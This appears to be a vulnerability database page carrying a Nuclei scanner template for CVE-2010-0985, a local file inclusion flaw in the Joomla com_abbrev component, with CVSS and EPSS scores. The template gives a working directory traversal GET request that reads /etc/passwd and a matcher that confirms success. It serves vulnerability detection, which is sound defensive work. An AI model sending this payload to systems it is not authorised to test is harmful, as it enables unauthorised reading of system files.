Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-0985
HistoryAug 28, 2021 - 10:24 a.m.

Joomla! Component com_abbrev - Local File Inclusion

2021-08-2810:24:20
ProjectDiscovery
github.com
7

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.4%

A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-0985

info:
  name: Joomla! Component com_abbrev - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/10948
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0985
    - http://www.exploit-db.com/exploits/10948
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-0985
    cwe-id: CWE-22
    epss-score: 0.01222
    epss-percentile: 0.85327
    cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: chris_simon
    product: com_abbrev
  tags: cve,cve2010,joomla,lfi,edb,chris_simon

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220121eea2f8efc9e38cb12151304aa83d5e81bff2a4cfac268f37609a74c81813f022100896e64ab8e257721c1577ef38d42c20fa3aecccddeee80a7162233267d0eb854:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.4%

Related for NUCLEI:CVE-2010-0985